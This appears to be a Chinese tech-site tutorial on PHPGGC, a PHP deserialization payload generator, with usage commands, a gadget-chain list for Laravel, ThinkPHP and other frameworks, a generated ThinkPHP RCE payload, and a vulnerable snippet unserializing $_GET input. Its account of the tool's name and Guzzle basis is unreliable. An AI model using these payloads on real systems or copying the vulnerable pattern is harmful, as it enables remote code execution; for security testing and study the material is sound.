概述

PHPGGC，全稱為“PHP Guzzle Getters and Setters”，是一個庫，包含了預構建的Guzzle HTTP客戶端請求對象，這些對象可以被用來利用PHP應用中的反射或魔術方法漏洞。它的核心價值在于簡化了對PHP應用程序潛在漏洞的探測過程，特別是對于那些可能存在的命令注入漏洞。e2G28資訊網——每日最新資訊28at.com

PHPGGC是一個unserialize()有效負載庫，沿著一個從命令行或編程方式生成它們的工具。當在您沒有代碼的網站上遇到未序列化時，或者只是試圖構建漏洞時，此工具允許您生成有效負載，而無需通過查找小工具并組合它們的繁瑣步驟。它可以被看作是frohoff的ysoserial的等價物，但用于PHP。e2G28資訊網——每日最新資訊28at.com

目前，該工具支持小工具鏈，如：CodeIgniter 4，Doctrine，Drupal 7，Guzzle，Laravel，Magento，Monolog，Phalcon，Podio，Slim，SwiftMailer，Symfony，Wordpress，Yii和ZendFramework。e2G28資訊網——每日最新資訊28at.com

技術分析

該項目基于PHP編寫，并且利用了Guzzle，這是一個流行的HTTP客戶端庫，能夠處理HTTP請求。PHPGGC通過創建特殊的GETters和SETters，它們在發送HTTP請求時可以被惡意構造，從而觸發不安全的代碼執行。這種構造方式使得安全研究人員能夠在各種不同的場景中快速驗證是否存在代碼注入風險，而無需手動編寫復雜的payload。e2G28資訊網——每日最新資訊28at.com

PHPGGC還支持命令行界面（CLI），允許用戶輕松地生成或搜索所需的GGC有效載荷。此外，其代碼結構清晰，易于擴展，意味著你可以根據需要添加新的GGC類型或者自定義功能。e2G28資訊網——每日最新資訊28at.com

應用場景

• 滲透測試：在進行安全審計時，可以直接使用PHPGGC生成的payload嘗試觸發潛在的命令注入漏洞。
• 教育與學習：理解如何構建這類攻擊載荷有助于提高開發者的安全意識。
• 自動化安全工具：集成到自動化安全掃描工具中，可以大規模檢測目標系統的安全性。

命令行使用

運行PHPGGC需要 PHP >= 5.6。e2G28資訊網——每日最新資訊28at.com

下載項目

git clone https://github.com/ambionics/phpggc.gitcd phpggc/

運行./phpggc -l獲取gadget鏈列表。e2G28資訊網——每日最新資訊28at.com

$ php ./phpggc -lGadget Chains-------------NAME                                      VERSION                                                 TYPE                      VECTOR          I    Bitrix/RCE1                               17.x.x <= 22.0.300                                      RCE: Function Call        __destruct           CakePHP/RCE1                              ? <= 3.9.6                                              RCE: Command              __destruct           CakePHP/RCE2                              ? <= 4.2.3                                              RCE: Function Call        __destruct           CodeIgniter4/FD1                          <= 4.3.6                                                File delete               __destruct           CodeIgniter4/FD2                          <= 4.3.7                                                File delete               __destruct    Laravel/RCE10                             5.6.0 <= 9.1.8+                                         RCE: Function Call        __toString           Laravel/RCE11                             5.4.0 <= 9.1.8+                                         RCE: Function Call        __destruct           Laravel/RCE12                             5.8.35, 7.0.0, 9.3.10                                   RCE: Function Call        __destruct      *    Laravel/RCE13                             5.3.0 <= 9.5.1+                                         RCE: Function Call        __destruct      *    Laravel/RCE14                             5.3.0 <= 9.5.1+                                         RCE: Function Call        __destruct           Laravel/RCE15                             5.5.0 <= v9.5.1+                                        RCE: Function Call        __destruct           Laravel/RCE16                             5.6.0 <= v9.5.1+                                        RCE: Function Call        __destruct           Laravel/RCE17                             10.31.0                                                 RCE: Function Call        __destruct           Laravel/RCE18                             10.31.0                                                 RCE: PHP Code             __destruct      *    Laravel/RCE19                             10.34                                                   RCE: Command              __destruct     Symfony/RCE14                             1.2.0 <= 1.2.12                                         RCE: Function Call        __wakeup        *    Symfony/RCE15                             1.0.0 <= 1.1.9                                          RCE: Function Call        __wakeup        *    Symfony/RCE16                             1.1.0 <= 1.5.18                                         RCE: Function Call        Serializable    *    TCPDF/FD1                                 <= 6.3.5                                                File delete               __destruct      *    ThinkPHP/FW1                              5.0.4-5.0.24                                            File write                __destruct      *    ThinkPHP/FW2                              5.0.0-5.0.03                                            File write                __destruct      *    ThinkPHP/RCE1                             5.1.x-5.2.x                                             RCE: Function Call        __destruct      *    ThinkPHP/RCE2                             5.0.24                                                  RCE: Function Call        __destruct      *    ThinkPHP/RCE3                             -6.0.1+                                                 RCE: Function Call        __destruct           ThinkPHP/RCE4                             -6.0.1+                                                 RCE: Function Call        __destruct           Typo3/FD1                                 4.5.35 <= 10.4.1                                        File delete               __destruct      *    ...

過濾器小工具鏈 `ThinkPHP。e2G28資訊網——每日最新資訊28at.com

$ php ./phpggc -l ThinkPHPGadget Chains-------------NAME             VERSION         TYPE                  VECTOR        I    ThinkPHP/FW1     5.0.4-5.0.24    File write            __destruct    *    ThinkPHP/FW2     5.0.0-5.0.03    File write            __destruct    *    ThinkPHP/RCE1    5.1.x-5.2.x     RCE: Function Call    __destruct    *    ThinkPHP/RCE2    5.0.24          RCE: Function Call    __destruct    *    ThinkPHP/RCE3    -6.0.1+         RCE: Function Call    __destruct         ThinkPHP/RCE4    -6.0.1+         RCE: Function Call    __destruct

每個小工具鏈都有。e2G28資訊網——每日最新資訊28at.com

• Name：框架/庫的名稱
• Version：小工具所使用的框架/庫的版本
• Type：利用類型：RCE，文件寫入，文件讀取，包含
• Vector：反序列化后觸發鏈的向量（__destruct()，__toString()，offsetGet()，...）
• Informations：關于鏈條的其他信息

使用-i獲取有關鏈的詳細信息e2G28資訊網——每日最新資訊28at.com

$ php ./phpggc -i ThinkPHP/RCE4Name           : ThinkPHP/RCE4Version        : -6.0.1+Type           : RCE: Function CallVector         : __destruct./phpggc ThinkPHP/RCE4 <function> <parameter>

運行./phpggc <gadget-chain> [parameters]以獲取有效負載。e2G28資訊網——每日最新資訊28at.com

$ php ./phpggc ThinkPHP/RCE4 assert 'phpinfo()'O:17:"think/model/Pivot":9:{s:19:"think/Modelexists";b:1;s:18:"think/Modelforce";b:1;s:21:"think/ModellazySave";b:1;s:9:"*suffix";O:17:"think/model/Pivot":9:{s:19:"think/Modelexists";N;s:18:"think/Modelforce";N;s:21:"think/ModellazySave";N;s:9:"*suffix";N;s:17:"think/Modeldata";a:1:{s:3:"key";a:1:{s:3:"key";s:9:"phpinfo()";}}s:21:"think/ModelwithAttr";a:1:{s:3:"key";a:1:{s:3:"key";s:6:"assert";}}s:7:"*json";a:1:{i:0;s:3:"key";}s:12:"*jsonAssoc";b:1;s:12:"*withEvent";N;}s:17:"think/Modeldata";a:1:{s:3:"key";a:1:{s:3:"key";s:9:"phpinfo()";}}s:21:"think/ModelwithAttr";N;s:7:"*json";N;s:12:"*jsonAssoc";N;s:12:"*withEvent";b:0;}

Wrapper

例如，如果易受攻擊的代碼看起來像這樣：tinywan_wrapper.php 腳本e2G28資訊網——每日最新資訊28at.com

<?php$data = unserialize($_GET['data']);print $data['message'];

執行結果e2G28資訊網——每日最新資訊28at.com

php ./phpggc -w ./my_wrapper.php slim/rce1 system idPHP Notice:  Undefined index: data in /home/www/build/phpggc/my_wrapper.php on line 2PHP Notice:  Trying to access array offset on value of type bool in /home/www/build/phpggc/tinywan_wrapper.php on line 3ERROR: Wrapper file does not define process_parameters(), process_object() or process_serialized()

你可以使用__toString()鏈，像這樣包裝它：tinywan_wrapper2.php 腳本e2G28資訊網——每日最新資訊28at.com

php ./phpggc -w ./tinywan_wrapper2.php slim/rce1 system ida:1:{s:7:"message";O:18:"Slim/Http/Response":2:{s:10:"*headers";O:8:"Slim/App":1:{s:19:"Slim/Appcontainer";O:14:"

e2G28資訊網——每日最新資訊28at.com

本文鏈接：http://www.tebozhan.com/showinfo-26-100471-0.htmlPHP安全測試秘密武器 PHPGGC

聲明：本網頁內容旨在傳播知識，若有侵權等問題請及時與本網聯系，我們將在第一時間刪除處理。郵件：2376512515@qq.com

上一篇： Go語言實現Base64、Base58編碼與解碼，很簡單

下一篇： 使用Spring Boot 3.x實現多平臺購票信息一致性保障